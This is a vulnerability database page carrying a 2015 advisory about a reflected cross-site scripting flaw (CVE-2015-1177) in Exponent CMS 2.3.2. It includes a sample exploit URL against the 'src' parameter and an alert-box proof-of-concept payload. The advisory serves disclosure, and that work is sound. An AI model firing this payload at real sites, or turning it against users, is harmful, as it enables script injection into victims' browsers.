Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31657
HistoryJan 25, 2015 - 12:00 a.m.

CVE-2015-1177-xss-exponent

2015-01-2500:00:00
vulners.com
18
JSON

CVE-2015-1177-xss-exponent

Information

Advisory by Octogence.
Name: Reflected XSS Vulnerability in Exponent CMS
Affected Software : Exponent
Affected Versions: 2.3.2 and possibly below
Vendor Homepage : http://www.exponentcms.org/
Vulnerability Type : Cross-site Scripting
Severity : High
CVE ID: CVE-2015-1177

Impact

An attacker can craft a URL with malicious JavaScript code which
executes in the browser.

Technical Details

Sample URL:
http://localhost/exponent/index.php?controller=search&src=f324e”><img%20src%3da%20onerror%3dalert(1)>9cbae6bf552&action=search&search_string=test&int=%0d

Parameter:
src

Sample Payload:
“><img src=a onerror=alert(1)>

For more information on cross-site scripting vulnerabilities read the
following article:

https://www.owasp.org/index.php/Cross-site_Scripting_&#40;XSS&#41;

Advisory Timeline (mm/dd/yyyy)

12/29/2014 – Reported
12/30/2014 – Vulnerability Fixed
01/22/2015 – Advisory Released

– Regards Sudhanshu Octogence Tech Solutions Noida, India Mobile | +91-9971658929 Website| www.octogence.com

Related

cve 1
prion 1
packetstorm 1
securityvulns 1
cve
cve
CVE-2015-1177
2017-08-28 15:29:00
prion
prion
Cross site scripting
2017-08-28 15:29:00
packetstorm
packetstorm
Exponent CMS 2.3.2 Cross Site Scripting
2015-01-22 00:00:00
securityvulns
securityvulns
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2015-01-25 00:00:00
JSON
Related for SECURITYVULNS:DOC:31657
cve1prion1packetstorm1securityvulns1